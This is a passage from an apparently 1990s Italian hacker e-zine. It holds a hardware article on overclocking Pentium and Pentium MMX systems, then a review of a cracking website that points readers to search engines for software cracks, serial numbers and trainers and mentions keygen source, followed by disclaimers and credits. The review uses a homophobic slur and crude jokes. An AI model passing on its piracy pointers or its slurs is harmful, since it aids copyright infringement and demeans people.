"fregare" INTEL, un P133 (66x2) puo' essere portato a 150 (75x2). Ma in fin dei conti, a chi giova tutto cio'? In maniera piu' che ovvia tutto questo fa aumentare la frequenza della CPU, incrementando in modo inequivocabile le prestazioni (anche solo di un 5%, ma di sicuro non calano) e questo e' dovuto anche al fatto che si innalza la frequenza della cache di II livello, ma purtroppo c'e' un aspetto importantissimo da tenere in considerazione: la RAM. Ormai stanno scomparendo le memorie a 70ns e si stanno diffondendo sempre piu' le 60ns e le EDO (che sono comunissime fast page con un buffer latch in uscita). La RAM e' una delle parti piu' lente del sistema (ovviamente escludendo HD, CD-rom..) e che in una percentuale inversamente proporzionale alla quantita' di cache montata "frena" ogni operazione. Certo, avere una piastra a 75Mhz potrebbe si' migliorare l'accesso alla memoria, ma l'aumento di velocita' del BUS con il quale la RAM e' messa in comunicazione col sistema non implica anche l'aumento della velocita' della RAM stessa. Quindi molti BIOS ancora si trovano impacciati a dover gestire i wait state su schede a 75Mhz con RAM molto lente, con inevitabili crash. Anche perche' solo EDO a 50ns o BEDO potrebbero sfruttare al meglio 83Mhz.... - I PENTIUM MMX : Finalmente! Dopo tanti annunci sono arrivati. Parlo delle CPU che Intel chiama P55C, ovvero Pentium con estensioni multimediali. Queste CPU esternamente sono quasi identiche ai Pentium che tutti conosciamo, piu' precisamente gli ultimi modelli con package plastico e non ceramico. Ma che cosa hanno di diverso questi processori? Vediamone le caratteristiche piu' importanti. -57 istruzioni aggiuntive. Queste sono le tanto pubblicizzate "estensioni multimediali", ovvero sono istruzioni assembler, quindi ad un livello di programmazione fra i piu' bassi, che permettono di manipolare dati multimediali in modo piu' efficiente. Ovviamente il software DEVE supportare queste istruzioni, ed i giochi con cui adesso ci divertiamo dovrebbero essere riscritti per sfruttare i P55C al meglio. Piedinatura: Praticamente identica al Pentium che tutti conosciamo. Quindi upgrade sempre possibile ? Assolutamente no, ed ecco il perche': Tensione di alimentazione: Intel ha deciso di abbassare ulteriormente la tensione di alimentazione delle nuove CPU. Questo significa che se montassimo un Pentium MMX a 166Mhz in una scheda su cui era installato con successo un Pentium 166 (senza MMX) la nuova CPU dopo pochi attimi si danneggerebbe irrimediabilmente. Infatti il core della CPU e' sceso da 3.3 a 2.8 Volt. Quindi per poter effettuare l'upgrade la scheda madre deve supportare a tutti gli effetti i P55C (basta consultarne il manuale). Ottimizzazioni: Anche se attualmente il software che supporti le istruzioni MMX scarseggia, i nuovi Pentium sono ugualmente piu' veloci, ovviamente a parita' di clock, dei "vecchi" P54C. Infatti Intel ha ottimizzato internamente il microcodice della CPU ed ha raddoppiato le dimensione della cache di secondo livello (e cio' e' molto positivo: questa infatti lavora alla medesima velocita' della CPU). Quindi un P54C a 200Mhz dovrebbe equivalere un P55C a 166Mhz nel codice NON MMX. - ESPERIENZE: Tralasciano i 68Mhz, in quanto difficilmente 2Mhz in possono creare problemi e solo un tipo di scheda madre in commercio a volte lo supporta, occupiamoci ora dei 75Mhz. Prima di iniziare ricordo che il passaggio da 66 a 75Mhz comporta: overclock del BUS PCI overclock del chipset overclock della cache L2 overclock della CPU overclock della RAM overclock di tutte le periferiche PCI overclock di tutte le periferiche ISA A volte certe periferiche PCI non gradiscono l'innalzamento della frequenza del BUS. Certi controller SCSI o certe SVGA ne sono l'esempio. Sebbene generalmente le piastre a questa velocita' modificano la latenza del PCI e le temporizzazioni interne si possono verificare ugualmente crash. Personalmente so che a volte il controller Adaptect 2940 puo' non reggere questa frequenza, ma c'e' un modo che a volte risolve il problema dei crash. Infatti nel menu del BIOS del controller stesso e' possibile modificare la massima velocita' del protocollo SCSI da utilizzare per ciascun ID SCSI. Abbassando questa impostazione non si peggiorano le prestazioni, al piu' il sottosistema disco rimane invariato, ma a volte si rende il sistema stabile. Stesso discorso vale anche per chi utilizza dischi rigidi EIDE. Alcuni modelli, tra cui gli ultimi IBM, danno moltissimi problemi. Vale anche qui il discorso fatto per i controller SCSI: basta abbassare da BIOS il settaggio da PIO 4 a PIO 3/2 e a volte il sistema puo' ritornare stabile. Se ancora siete in possesso di fast paged a 70ns il mio consiglio e' quello di cambiarla assolutamente in (EDO e' forse meglio) a 60ns, specie se siete interessati a frequenze maggiori o uguali a 75Mhz. Certo anche della fp a 70ns puo' funzionare a 75Mhz, ma sarebbero neccessari molti cicli di attesa. Dopo aver settato la piastra a 75Mhz o piu', portare immediatamente da bios i settaggi quasi al massimo, verificare la stabilita' del sistema e di conseguenza abbassare o provare ad innalzare i tempi di accesso. Un altro aspetto da tenere in considerazione e' la tensione di voltaggio della CPU. Infatti certi Pentium funzionano perfettamente in STD (3.3 volt) ma quando si overclockano preferiscono il VRE (3.45volt). Se il sistema dopo un overclock ha qualche problema, specie con CPU Pentium a 150/166Mhz dal package ceramico, allora "giocate la carta" VRE : puo' rivelarsi vincente. Un appunto per chi usa il mitico Linux: se il GCC vi da' dei Signal 11 in compilazione, provare a settare l'alimentazione in VRE. Attenzione, come sempre, alla temperatura. Dopo tutte queste precisazioni anche i meno curiosi si saranno gia' posti la domanda: "Ma se per ottenere un sistema Pentium 166 dato da 83x2 devo prestare attenzione a tutte queste cose, in fondo chi me lo fa fare?" Assolutamente nessuno obbliga nessuno a smanettare continuamente, ma consideriamo questo. I nuovi Pentium MMX con codice MMX sono piu' veloci non tanto per le ottimizzazioni interne, ma perche' hanno una cache L1 di dimensioni doppie rispetto a quella dei Pentium tradizionali. Quindi un aumento di frequenza di tutti i componenti presenti sulla scheda madre, compresa la cache L2, porta ad un significativo aumento di prestazioni. Un Pentium a 166Mhz ottenuti da 83x2 il piu' delle volte e' nettamente superiore ad un sistema P200 "tradizionale". Generalmente non parlo di benchmark, ma ho fatto moltissimi test CPUMark32 e vi posso assicurare che la frequenza di lavoro della scheda madre e della cache L2 influisce notevolmente sulle prestazioni globali del sistema. Ma attenzione a non esagerare! Wrote by Zen97 and Hal9000 P.S.: zen97 e hal9000 ringraziano Simone T. per il suo gentile supporto. e-mail : hal9@cryogen.com Zen97 Hal9000 ͻ SiTi CRACKiNG NETW0RK ͼ Salve a tutti mi presento sono l'orsetto ricchione, ehm, questo non c'entra, sono il vostro fidato Cavallo de Cavallis, fanalino di coda di questo magazine, che galoppa ad illustrarvi pregi e difetti di un sito abbastanza nuovo dedicato al vostro sport preferito dopo il lancio di nuke, il Crack !! Per visualizzare il sitarello in questione puntate il vostro browser di fiducia (o se preferite lanciate una tranquilla sessione di Teleport Pro e scaricatevelo tutto :-)) su WWW.CRACKING.NET, ed ora.. Fuoco !! Welcome to The Cracking Network ... E cosi' eccoci a questa pagina, divisa in frame (che io personalmente odio ma che in questo caso sono usati a buon fine) che si presenta dotata di una buona grafica Hi-Tech e di altrettanto buoni contenuti. Sulla destra potete osservare il Naviglio, laggiu' il Duomo con la Madunina, ops, ho sbagliato guida ! :-) , no dai seriamente, sulla destra trovate una immagine mappata che fa da menu e che ci introduce alle possibili bellezze del sito; in sintesi abbiamo 8 possibilita' : * FRAVIA'S PAGE OF REVERSE ENGINEERING Da qui accedete alla famosissima pagina di Fravia dedicata al Reverse Engineering, con le guide di +ORC, quelle realizzate dagli studenti della sua +HCU, consigli su come rimanere anonimi sulla rete etc.. (Consiglio Personale, non entrateci con Internet ExploDer :)) * SECURITY Pagina ancora in costruzione, 2 soli link previsti , il primo ci porta alla pagina ufficiale del John the Ripper mentre il secondo riguarda un patch per il kernel del Linux (mi pare) * JAMMER'S TRAINER SCENE Pagina completamente dedicata ai trainer, cioe' come Jammer stesso li definisce "quei piccoli programmi che ti permettono di fare cose che non hai mai fatto prima. Essi possono darti vite infinite e farti saltare interi livelli. Il Training e' un arte conosciuta solo da poche persone talentuose nel mondo e sfortunatamente sta lentamente scomparendo dopo l'introduzione di - quella merda di (by Cavallo) - Windows '95." * KRACKAVISTA Ecco qui un bel motore di ricerca per crack, seriali e trainer, forse migliore di Astalavista (Astalavista.box.sk), sicuramente piu' veloce; non capisco pero' perche' quando si cercano i crack invece di dare i collegamenti ai crack mostra solo il nome e la descrizione, mentre tutto funziona alla perfezione con i trainer, BOH SALCAZZO!! Vi conviene segnarvi giu' il nome del Crack e poi andarlo a cercare con il fido FTP-Search (ftpsearch.ntnu.no) * LINKS Un minielenco di siti interessanti, innanzitutto quelli relativi ad alcuni gruppi MUST dell'underground tipo Razor, Hybrid, Prestige, poi qualche sitarello vario e i links ai siti della Numega (produttori del grande SoftIce) e della DataRescue (per l'IDA, P.S. LO VOGLIO !!). Secondo me e' pero' un po' limitato, soprattutto pesa la mancanza del sito di Lord Caligo (cracking.home.ml.org) che secondo me e' il massimo per completezza. * SIGN GUESTBOOK Se volete lasciare un segno, un messaggio o magari un bambino morto, venite qui :)) * PEOPLE Qui potete trovare un elenco alfabetico di Cracker con riferimento ai tools preferiti, alle loro Home Page etc..., indovinate chi trovate sotto la C ?!? :-D * #CRACKING Qui trovate la #Cracking FAQ, con le domande piu' frequenti poste nel canale IRC #cracking, oltre che il log di una conversazione che potrebbe capitare in esso (per vedere il livello medio dei discorsi) e per finire la sorgente per il 100% keygenerator for CDR-Win 3.1e/DAO 16/32 che a quanto ne so ha notevoli controlli del codice e se non erro sputtana i CD se trova un codice non propriamente buono !! (da testare) Se cliccate sullo scudo sarete invece portati alla pagina di Greythorne The Technomancer. Mah, tutto sommato darei come voto un 8/10 a questo sito, spero concordiate con me e se non concordate C***I VOSTRI !! :) Direi che ho concluso, Happy Cracking a tutti voi !! Cavallo De Cavallis ********************************! ATTENZIONE !********************************* * TUTTO IL MATERIALE CONTENUTO IN BUTCHERED FROM INSIDE E' DA RITENERSI A * * SOLO SCOPO INFORMATIVO. LA REDAZIONE DI BUTCHERED FROM INSIDE NON SI RITIENE* * IN ALCUN MODO RESPONSABILE PER DANNI CAUSATI DALL'USO DI PROGRAMMI, CODICE, * * * INFORMAZIONI CONTENUTI ALL'INTERNO DELLA RIVISTA. PENSATE AI VOSTRI AMICI, * * ALLA VOSTRA RAGAZZA, AI VOSTRI GENITORI, AL VOSTRO CANE, A NOI E SOPRATUTTO * * A VOI STESSI PRIMA DI FARE QUALCHE CAZZATA! * ******************************************************************************* * SI _VIETA_ DI POSTARE QUESTO MAGAZINE IN QUALSIASI NEWSGROUP * ******************************************************************************* ͻ Ŀ HANN0 C0LLA0RAT0 A QUEST0 NUMER0: bELFaghor Nocturnus Daem0n - Blinking - Cavallo - Dr_Slump DrumFire - Hal9000 - Nefasto - PFloriK - pIGpEN - PhoenYx PUCK - |scacco| - SMa$teR - sPIRIT - The_Hawk - Vanadio Zen97 iL SiT0 UiCiALE Di UTCHERED R0M iNSiDE: http://bfi98.home.ml.org C0NTATTATECi ViA E-MAiL: BFI98@USA.NET ٺ ͼ